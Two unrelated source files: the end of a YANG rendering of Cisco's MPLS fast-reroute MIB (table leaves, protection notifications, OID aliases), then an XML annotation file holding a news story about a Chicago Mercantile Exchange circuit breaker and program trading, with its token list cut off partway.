type mpls-tc:MplsLsrIdentifier;
description
"Uniquely identifies an mplsTunnelEntry that is
being protected by FRR.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels,
Awduche et al, RFC 3209, December 2001
2. Constraint-Based LSP Setup using LDP, Jamoussi
(Editor), RFC 3212, January 2002";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.5";
}
leaf cmplsFrrFacRouteProtectedTunEgressLSRId {
type mpls-tc:MplsLsrIdentifier;
description
"Uniquely identifies an mplsTunnelEntry that is
being protected by FRR.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.6";
}
leaf cmplsFrrFacRouteProtectedTunStatus {
type enumeration {
enum "active" {
value "1";
}
enum "ready" {
value "2";
}
enum "partial" {
value "3";
}
}
description
"Specifies the state of the protected tunnel.
active This tunnel's label has been placed in the
LFIB and is ready to be applied to incoming
packets.
ready - This tunnel's label entry has been created but is
not yet in the LFIB.
partial - This tunnel's label entry as not been fully
created.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.7";
}
leaf cmplsFrrFacRouteProtectingTunResvBw {
type mpls-tc:MplsBitRate;
description
"Specifies the amount of bandwidth in megabytes per second
that is actually reserved by the backup tunnel for
facility backup. This value is repeated here from the MPLS-
TE MIB because the tunnel entry will reveal the bandwidth
reserved by the signaling protocol, which is typically 0
for backup tunnels so as to not over-book bandwidth.
However, internal reservations are typically made on the
PLR, thus this value should be revealed here.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.8";
}
leaf cmplsFrrFacRouteProtectingTunProtectionType {
type enumeration {
enum "linkProtection" {
value "0";
}
enum "nodeProtection" {
value "1";
}
}
description
"Indicates type of the resource protection.";
smiv2:defval "nodeProtection";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.9";
}
}
}
}
notification cmplsFrrProtected {
description
"This notification is generated when a tunnel running over an
interface as specified in the mplsFrrConstTable is initially
protected by the backup tunnel also specified in the
cmplsFrrConstTable. This notification should not be generated
for each subsequent tunnel that is backed up by the FRR feature
on this LSR, as this may result in potential scaling issues
with regard to LSR performance and network loading. Note also
that notifications MUST be generated in accordance with the
cmplsFrrNotifMaxRate.";
smiv2:oid "1.3.6.1.4.1.9.10.98.0.1";
container object-1 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstNumProtectingTunOnIf {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstNumProtectingTunOnIf";
}
}
}
container object-2 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstNumProtectedTunOnIf {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstNumProtectedTunOnIf";
}
}
}
container object-3 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstBandwidth {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstBandwidth";
}
}
}
}
notification cmplsFrrUnProtected {
description
"This notification is generated when the final tunnel that is
being protected by a backup tunnel as specified in the
cmplsFrrConstTable is restored to normal operation. This
notification should not be generated for each restored tunnel,
as this may result in potential scaling issues with regard to
LSR performance and network loading. Note also that
notifications MUST be generated in accordance with the
cmplsFrrNotifMaxRate.";
smiv2:oid "1.3.6.1.4.1.9.10.98.0.2";
container object-1 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstNumProtectingTunOnIf {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstNumProtectingTunOnIf";
}
}
}
container object-2 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstNumProtectedTunOnIf {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstNumProtectedTunOnIf";
}
}
}
container object-3 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstBandwidth {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstBandwidth";
}
}
}
}
smiv2:alias "cmplsFrrMIB" {
smiv2:oid "1.3.6.1.4.1.9.10.98";
}
smiv2:alias "cmplsFrrNotif" {
smiv2:oid "1.3.6.1.4.1.9.10.98.0";
}
smiv2:alias "cmplsFrrScalars" {
smiv2:oid "1.3.6.1.4.1.9.10.98.1";
}
smiv2:alias "cmplsFrrObjects" {
smiv2:oid "1.3.6.1.4.1.9.10.98.2";
}
smiv2:alias "cmplsFrrGeneralObjects" {
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1";
}
smiv2:alias "cmplsFrr1to1Objects" {
smiv2:oid "1.3.6.1.4.1.9.10.98.2.2";
}
smiv2:alias "cmplsFrrFacObjects" {
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3";
}
smiv2:alias "cmplsFrrConformance" {
smiv2:oid "1.3.6.1.4.1.9.10.98.3";
}
smiv2:alias "cmplsFrrGroups" {
smiv2:oid "1.3.6.1.4.1.9.10.98.3.1";
}
smiv2:alias "cmplsFrrCompliances" {
smiv2:oid "1.3.6.1.4.1.9.10.98.3.2";
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<story>
<rep id="edu.mit.story.char">
<desc id="0" len="5352" off="0">
The Chicago Mercantile Exchange said it plans to institute an additional
``circuit breaker'' aimed at stemming market slides. Separately, John
Phelan told a closed House subcommittee meeting in Washington that he
would support Securities and Exchange Commission halts of program trading
during market emergencies. But the New York Stock Exchange chairman said
he doesn't support reinstating a ``collar'' on program trading, arguing
that firms could get around such a limit. The Chicago Merc said a new
one-hour price limit would take effect in its Standard & Poor's 500
stock-index futures pit once S&P 500 futures fell 20 index points -- the
equivalent of about a 150-point drop in the Dow Jones Industrial Average.
If the 20-point limit is triggered after 1:30 p.m. Chicago time, it would
remain in effect until the normal close of trading at 3:15 p.m. With the
limit in effect, members would be able to execute trades at the limit
price or at higher prices, but not below it. The exchange said it decided
a new circuit breaker was needed following a review of the tumultuous
trading in stocks and stock-index futures on Friday Oct. 13, when the Dow
Jones industrials plunged 190 points and stock-index futures prices skidded
as well. Late that afternoon the S&P 500 stock-index futures contract fell
a total of 30 index points, hitting a Merc circuit breaker limit that
remained in effect for the rest of the trading session. The Merc said that
its existing 30-minute, 12-point limit on S&P 500 stock-index futures trading is
equal to about 100 points on the Dow Jones industrials, which was triggered
Oct. 13, will remain in effect. Leo Melamed, Merc executive committee chairman,
said that the 12-point limit appeared to lessen the selling panic Oct. 13.
But when the contract reopened, the subsequent flood of sell orders that
quickly knocked the contract down to the 30-point limit indicated that the
intermediate limit of 20 points was needed to help keep stock and stock-index
futures prices synchronized. Several traders maintained that the Merc's 12-point
circuit-breaker aggravated the market slide Oct. 13 by directing additional
selling pressure to the floor of the New York Stock Exchange. All of the changes
require regulatory approval, which is expected shortly. The exchange also said
that the 30-point circuit breaker, which currently provides only a one-hour
respite during market sell-offs, will become the maximum one-day limit for the
S&P 500 stock-index futures contract; the one-day limit now is 50 index points.
A final modification was made to the five-point opening limit for the contract.
The Merc said that five-point limit will remain in effect for the first 10 minutes
of trading. The limit lapses under current exchange rules if contracts trade above
the limit price during the opening 10 minutes of trading. In Washington, House
aides said Mr. Phelan told congressmen that the collar, which banned program trades
through the Big Board's computer when the Dow Jones Industrial Average moved 50
points, didn't work well. He said that firms could get around the collar by executing
trades manually. In a post-hearing news conference, Mr. Phelan, who has publicly
expressed concern about market volatility, said he told the House finance and
telecommunications subcommittee that he would support the program-trading halt proposal
``providing the SEC would be comfortable with the language'' in a bill. The
program-trading issue is heating up on Capitol Hill as it is on Wall Street, and
several legislators want to grant the SEC the power to shut off the programs
when trading becomes too volatile. SEC Chairman Richard Breeden has said he would be
willing to consider circuit breakers that have preset trigger points, but he doesn't
want discretionary power to stop programs. A House aide suggested that Mr. Phelan was
so ``vague and mushy'' that it was the kind of meeting where people of all viewpoints
could ``come out feeling good.'' At one point, Mr. Phelan angered the subcommittee's
chairman, Rep. Edward Markey D., Mass., by not going much beyond what already had been
reported in the morning newspapers. ``Markey said we could have done this in public''
because so little sensitive information was disclosed, the aide said. Mr. Phelan then
responded that he would have been happy just writing a report to the panel, the aide added.
At another point during the hearing, Rep. Markey asked Mr. Phelan what would be discussed
at a New York exchange board meeting today. Mr. Phelan said the Big Board is likely to
study the program-trading issue. That response annoyed Rep. Markey, House aides said, and
the congressman snapped back that there had been enough studies of the issue and that it
was time for action on the matter. Fifteen of the 26 subcommittee members attended the
hearing, most notably Rep. John Dingell D., Mich., the full House Energy and Commerce
Committee chairman, who has been willing to let Mr. Markey carry the legislation in recent
months. Mr. Dingell expressed concern, sources said, about jurisdictional problems in
regulating program trading, which uses futures to offset stock trades. The futures industry
is regulated by the Commodity Futures Trading Commission, which reports to the Agriculture
committees in both houses.
</desc>
</rep>
<rep id="edu.mit.story.text">
<desc id="1" len="5352" off="0">TEXT</desc>
</rep>
<rep id="edu.mit.parsing.token">
<desc id="2" len="3" off="0">The</desc>
<desc id="4" len="7" off="4">Chicago</desc>
<desc id="6" len="10" off="12">Mercantile</desc>
<desc id="8" len="8" off="23">Exchange</desc>
<desc id="10" len="4" off="32">said</desc>
<desc id="12" len="2" off="37">it</desc>
<desc id="14" len="5" off="40">plans</desc>
<desc id="16" len="2" off="46">to</desc>
<desc id="18" len="9" off="49">institute</desc>
<desc id="20" len="2" off="59">an</desc>
<desc id="22" len="10" off="62">additional</desc>
<desc id="24" len="2" off="74">``</desc>
<desc id="26" len="7" off="76">circuit</desc>
<desc id="28" len="7" off="84">breaker</desc>
<desc id="30" len="2" off="91">''</desc>
<desc id="32" len="5" off="94">aimed</desc>
<desc id="34" len="2" off="100">at</desc>
<desc id="36" len="8" off="103">stemming</desc>
<desc id="38" len="6" off="112">market</desc>
<desc id="40" len="6" off="119">slides</desc>
<desc id="42" len="1" off="125">.</desc>
<desc id="45" len="10" off="127">Separately</desc>
<desc id="47" len="1" off="137">,</desc>
<desc id="49" len="4" off="139">John</desc>
<desc id="51" len="6" off="145">Phelan</desc>
<desc id="53" len="4" off="152">told</desc>
<desc id="55" len="1" off="157">a</desc>
<desc id="57" len="6" off="159">closed</desc>
<desc id="59" len="5" off="166">House</desc>
<desc id="61" len="12" off="172">subcommittee</desc>
<desc id="63" len="7" off="185">meeting</desc>
<desc id="65" len="2" off="193">in</desc>
<desc id="67" len="10" off="196">Washington</desc>
<desc id="69" len="4" off="207">that</desc>
<desc id="71" len="2" off="212">he</desc>
<desc id="73" len="5" off="216">would</desc>
<desc id="75" len="7" off="222">support</desc>
<desc id="77" len="10" off="230">Securities</desc>
<desc id="79" len="3" off="241">and</desc>
<desc id="81" len="8" off="245">Exchange</desc>
<desc id="83" len="10" off="254">Commission</desc>
<desc id="85" len="5" off="265">halts</desc>
<desc id="87" len="2" off="271">of</desc>
<desc id="89" len="7" off="274">program</desc>
<desc id="91" len="7" off="282">trading</desc>
<desc id="93" len="6" off="291">during</desc>
<desc id="95" len="6" off="298">market</desc>
<desc id="97" len="11" off="305">emergencies</desc>
<desc id="99" len="1" off="316">.</desc>
<desc id="102" len="3" off="318">But</desc>
<desc id="104" len="3" off="322">the</desc>
<desc id="106" len="3" off="326">New</desc>
<desc id="108" len="4" off="330">York</desc>
<desc id="110" len="5" off="335">Stock</desc>
<desc id="112" len="8" off="341">Exchange</desc>
<desc id="114" len="8" off="350">chairman</desc>
<desc id="116" len="4" off="359">said</desc>
<desc id="118" len="2" off="365">he</desc>
<desc id="120" len="4" off="368">does</desc>
<desc id="122" len="3" off="372">n't</desc>
<desc id="124" len="7" off="376">support</desc>
<desc id="126" len="11" off="384">reinstating</desc>
<desc id="128" len="1" off="396">a</desc>
<desc id="130" len="2" off="398">``</desc>
<desc id="132" len="6" off="400">collar</desc>
<desc id="134" len="2" off="406">''</desc>
<desc id="136" len="2" off="409">on</desc>
<desc id="138" len="7" off="412">program</desc>
<desc id="140" len="7" off="420">trading</desc>
<desc id="142" len="1" off="427">,</desc>
<desc id="144" len="7" off="429">arguing</desc>
<desc id="146" len="4" off="438">that</desc>
<desc id="148" len="5" off="443">firms</desc>
<desc id="150" len="5" off="449">could</desc>
<desc id="152" len="3" off="455">get</desc>
<desc id="154" len="6" off="459">around</desc>
<desc id="156" len="4" off="466">such</desc>
<desc id="158" len="1" off="471">a</desc>
<desc id="160" len="5" off="473">limit</desc>
<desc id="162" len="1" off="478">.</desc>
<desc id="165" len="3" off="480">The</desc>
<desc id="167" len="7" off="484">Chicago</desc>
<desc id="169" len="4" off="492">Merc</desc>
<desc id="171" len="4" off="497">said</desc>
<desc id="173" len="1" off="502">a</desc>
<desc id="175" len="3" off="504">new</desc>
<desc id="177" len="8" off="509">one-hour</desc>
<desc id="179" len="5" off="518">price</desc>
<desc id="181" len="5" off="524">limit</desc>
<desc id="183" len="5" off="530">would</desc>
<desc id="185" len="4" off="536">take</desc>
<desc id="187" len="6" off="541">effect</desc>
<desc id="189" len="2" off="548">in</desc>
<desc id="191" len="3" off="551">its</desc>
<desc id="193" len="8" off="555">Standard</desc>
<desc id="195" len="1" off="564">&</desc>
<desc id="197" len="4" off="566">Poor</desc>
<desc id="199" len="2" off="570">'s</desc>
<desc id="201" len="3" off="573">500</desc>
<desc id="203" len="11" off="578">stock-index</desc>
<desc id="205" len="7" off="590">futures</desc>
<desc id="207" len="3" off="598">pit</desc>
<desc id="209" len="4" off="602">once</desc>
<desc id="211" len="3" off="607">S&P</desc>
<desc id="213" len="3" off="611">500</desc>
<desc id="215" len="7" off="615">futures</desc>
<desc id="217" len="4" off="623">fell</desc>
<desc id="219" len="2" off="628">20</desc>
<desc id="221" len="5" off="631">index</desc>
<desc id="223" len="6" off="637">points</desc>
<desc id="225" len="2" off="644">--</desc>
<desc id="227" len="3" off="647">the</desc>
<desc id="229" len="10" off="652">equivalent</desc>
<desc id="231" len="2" off="663">of</desc>
<desc id="233" len="5" off="666">about</desc>
<desc id="235" len="1" off="672">a</desc>
<desc id="237" len="9" off="674">150-point</desc>
<desc id="239" len="4" off="684">drop</desc>
<desc id="241" len="2" off="689">in</desc>
<desc id="243" len="3" off="692">the</desc>
<desc id="245" len="3" off="696">Dow</desc>
<desc id="247" len="5" off="700">Jones</desc>
<desc id="249" len="10" off="706">Industrial</desc>
<desc id="251" len="7" off="717">Average</desc>
<desc id="253" len="1" off="724">.</desc>
<desc id="256" len="2" off="727">If</desc>
<desc id="258" len="3" off="730">the</desc>
<desc id="260" len="8" off="734">20-point</desc>
<desc id="262" len="5" off="743">limit</desc>
<desc id="264" len="2" off="749">is</desc>
<desc id="266" len="9" off="752">triggered</desc>
<desc id="268" len="5" off="762">after</desc>
<desc id="270" len="4" off="768">1:30</desc>
<desc id="272" len="3" off="773">p.m</desc>
<desc id="274" len="1" off="776">.</desc>
<desc id="276" len="7" off="778">Chicago</desc>
<desc id="278" len="4" off="786">time</desc>
<desc id="280" len="1" off="790">,</desc>
<desc id="282" len="2" off="792">it</desc>
<desc id="284" len="5" off="795">would</desc>
<desc id="286" len="6" off="802">remain</desc>
<desc id="288" len="2" off="809">in</desc>
<desc id="290" len="6" off="812">effect</desc>
<desc id="292" len="5" off="819">until</desc>
<desc id="294" len="3" off="825">the</desc>
<desc id="296" len="6" off="829">normal</desc>
<desc id="298" len="5" off="836">close</desc>
<desc id="300" len="2" off="842">of</desc>
<desc id="302" len="7" off="845">trading</desc>
<desc id="304" len="2" off="853">at</desc>
<desc id="306" len="4" off="856">3:15</desc>
<desc id="308" len="3" off="861">p.m</desc>
<desc id="310" len="1" off="864">.</desc>
<desc id="313" len="4" off="866">With</desc>
<desc id="315" len="3" off="871">the</desc>
<desc id="317" len="5" off="876">limit</desc>
<desc id="319" len="2" off="882">in</desc>
<desc id="321" len="6" off="885">effect</desc>
<desc id="323" len="1" off="891">,</desc>
<desc id="325" len="7" off="893">members</desc>
<desc id="327" len="5" off="901">would</desc>
<desc id="329" len="2" off="907">be</desc>
<desc id="331" len="4" off="910">able</desc>
<desc id="333" len="2" off="915">to</desc>
<desc id="335" len="7" off="918">execute</desc>
<desc id="337" len="6" off="926">trades</desc>
<desc id="339" len="2" off="933">at</desc>
<desc id="341" len="3" off="936">the</desc>
<desc id="343" len="5" off="940">limit</desc>
<desc id="345" len="5" off="947">price</desc>
<desc id="347" len="2" off="953">or</desc>
<desc id="349" len="2" off="956">at</desc>
<desc id="351" len="6" off="959">higher</desc>
<desc id="353" len="6" off="966">prices</desc>
<desc id="355" len="1" off="972">,</desc>
<desc id="357" len="3" off="974">but</desc>
<desc id="359" len="3" off="978">not</desc>
<desc id="361" len="5" off="982">below</desc>
<desc id="363" len="2" off="988">it</desc>
<desc id="365" len="1" off="990">.</desc>
<desc id="368" len="3" off="992">The</desc>
<desc id="370" len="8" off="996">exchange</desc>
<desc id="372" len="4" off="1005">said</desc>
<desc id="374" len="2" off="1010">it</desc>
<desc id="376" len="7" off="1013">decided</desc>
<desc id="378" len="1" off="1022">a</desc>
<desc id="380" len="3" off="1024">new</desc>
<desc id="382" len="7" off="1028">circuit</desc>
<desc id="384" len="7" off="1036">breaker</desc>
<desc id="386" len="3" off="1044">was</desc>
<desc id="388" len="6" off="1048">needed</desc>
<desc id="390" len="9" off="1055">following</desc>
<desc id="392" len="1" off="1065">a</desc>
<desc id="394" len="6" off="1067">review</desc>
<desc id="396" len="2" off="1074">of</desc>
<desc id="398" len="3" off="1077">the</desc>
<desc id="400" len="10" off="1081">tumultuous</desc>
<desc id="402" len="7" off="1093">trading</desc>
<desc id="404" len="2" off="1101">in</desc>
<desc id="406" len="6" off="1104">stocks</desc>
<desc id="408" len="3" off="1111">and</desc>
<desc id="410" len="11" off="1115">stock-index</desc>
<desc id="412" len="7" off="1127">futures</desc>
<desc id="414" len="2" off="1135">on</desc>
<desc id="416" len="6" off="1138">Friday</desc>
<desc id="418" len="4" off="1145">Oct.</desc>
<desc id="420" len="2" off="1150">13</desc>
<desc id="422" len="1" off="1152">,</desc>
<desc id="424" len="4" off="1154">when</desc>
<desc id="426" len="3" off="1159">the</desc>
<desc id="428" len="3" off="1163">Dow</desc>
<desc id="430" len="5" off="1168">Jones</desc>
<desc id="432" len="11" off="1174">industrials</desc>
<desc id="434" len="7" off="1186">plunged</desc>
<desc id="436" len="3" off="1194">190</desc>
<desc id="438" len="6" off="1198">points</desc>
<desc id="440" len="3" off="1205">and</desc>
<desc id="442" len="11" off="1209">stock-index</desc>
<desc id="444" len="7" off="1221">futures</desc>
<desc id="446" len="6" off="1229">prices</desc>
<desc id="448" len="7" off="1236">skidded</desc>
<desc id="450" len="2" off="1245">as</desc>
<desc id="452" len="4" off="1248">well</desc>
<desc id="454" len="1" off="1252">.</desc>
<desc id="457" len="4" off="1254">Late</desc>
<desc id="459" len="4" off="1259">that</desc>
<desc id="461" len="9" off="1264">afternoon</desc>
<desc id="463" len="3" off="1274">the</desc>
<desc id="465" len="3" off="1278">S&P</desc>
<desc id="467" len="3" off="1282">500</desc>
<desc id="469" len="11" off="1286">stock-index</desc>
<desc id="471" len="7" off="1298">futures</desc>
<desc id="473" len="8" off="1306">contract</desc>
<desc id="475" len="4" off="1315">fell</desc>
<desc id="477" len="1" off="1321">a</desc>
<desc id="479" len="5" off="1323">total</desc>
<desc id="481" len="2" off="1329">of</desc>
<desc id="483" len="2" off="1332">30</desc>
<desc id="485" len="5" off="1335">index</desc>
<desc id="487" len="6" off="1341">points</desc>
<desc id="489" len="1" off="1347">,</desc>
<desc id="491" len="7" off="1349">hitting</desc>
<desc id="493" len="1" off="1357">a</desc>
<desc id="495" len="4" off="1359">Merc</desc>
<desc id="497" len="7" off="1364">circuit</desc>
<desc id="499" len="7" off="1372">breaker</desc>
<desc id="501" len="5" off="1380">limit</desc>
<desc id="503" len="4" off="1386">that</desc>
<desc id="505" len="8" off="1392">remained</desc>
<desc id="507" len="2" off="1401">in</desc>
<desc id="509" len="6" off="1404">effect</desc>
<desc id="511" len="3" off="1411">for</desc>
<desc id="513" len="3" off="1415">the</desc>
<desc id="515" len="4" off="1419">rest</desc>
<desc id="517" len="2" off="1424">of</desc>
<desc id="519" len="3" off="1427">the</desc>
<desc id="521" len="7" off="1431">trading</desc>
<desc id="523" len="7" off="1439">session</desc>
<desc id="525" len="1" off="1446">.</desc>
<desc id="528" len="3" off="1448">The</desc>
<desc id="530" len="4" off="1452">Merc</desc>
<desc id="532" len="4" off="1457">said</desc>
<desc id="534" len="4" off="1462">that</desc>
<desc id="536" len="3" off="1468">its</desc>
<desc id="538" len="8" off="1472">existing</desc>
<desc id="540" len="9" off="1481">30-minute</desc>
<desc id="542" len="1" off="1490">,</desc>
<desc id="544" len="8" off="1492">12-point</desc>
<desc id="546" len="5" off="1501">limit</desc>
<desc id="548" len="2" off="1507">on</desc>
<desc id="550" len="3" off="1510">S&P</desc>
<desc id="552" len="3" off="1514">500</desc>
<desc id="554" len="11" off="1518">stock-index</desc>
<desc id="556" len="7" off="1530">futures</desc>
<desc id="558" len="7" off="1538">trading</desc>
<desc id="3048" len="2" off="1546">is</desc>
<desc id="560" len="5" off="1549">equal</desc>
<desc id="562" len="2" off="1555">to</desc>
<desc id="564" len="5" off="1558">about</desc>
<desc id="566" len="3" off="1564">100</desc>
<desc id="568" len="6" off="1568">points</desc>
<desc id="570" len="2" off="1575">on</desc>
<desc id="572" len="3" off="1578">the</desc>
<desc id="574" len="3" off="1582">Dow</desc>
<desc id="576" len="5" off="1586">Jones</desc>
<desc id="578" len="11" off="1592">industrials</desc>
<desc id="580" len="1" off="1603">,</desc>
<desc id="582" len="5" off="1605">which</desc>
<desc id="584" len="3" off="1611">was</desc>
<desc id="586" len="9" off="1615">triggered</desc>
<desc id="588" len="4" off="1626">Oct.</desc>
<desc id="590" len="2" off="1631">13</desc>
<desc id="592" len="1" off="1633">,</desc>
<desc id="594" len="4" off="1635">will</desc>
<desc id="596" len="6" off="1640">remain</desc>
<desc id="598" len="2" off="1647">in</desc>
<desc id="600" len="6" off="1650">effect</desc>
<desc id="602" len="1" off="1656">.</desc>
<desc id="605" len="3" off="1658">Leo</desc>
<desc id="607" len="7" off="1662">Melamed</desc>
<desc id="609" len="1" off="1669">,</desc>
<desc id="611" len="4" off="1671">Merc</desc>
<desc id="613" len="9" off="1676">executive</desc>
<desc id="615" len="9" off="1686">committee</desc>
<desc id="617" len="8" off="1696">chairman</desc>
<desc id="619" len="1" off="1704">,</desc>
<desc id="621" len="4" off="1707">said</desc>
<desc id="623" len="4" off="1712">that</desc>
<desc id="625" len="3" off="1717">the</desc>
<desc id="627" len="8" off="1721">12-point</desc>
<desc id="629" len="5" off="1730">limit</desc>
<desc id="631" len="8" off="1736">appeared</desc>
<desc id="633" len="2" off="1745">to</desc>
<desc id="635" len="6" off="1748">lessen</desc>
<desc id="637" len="3" off="1755">the</desc>
<desc id="639" len="7" off="1759">selling</desc>
<desc id="641" len="5" off="1767">panic</desc>
<desc id="643" len="4" off="1773">Oct.</desc>
<desc id="645" len="2" off="1778">13</desc>
<desc id="647" len="1" off="1780">.</desc>
<desc id="650" len="3" off="1783">But</desc>
<desc id="652" len="4" off="1787">when</desc>
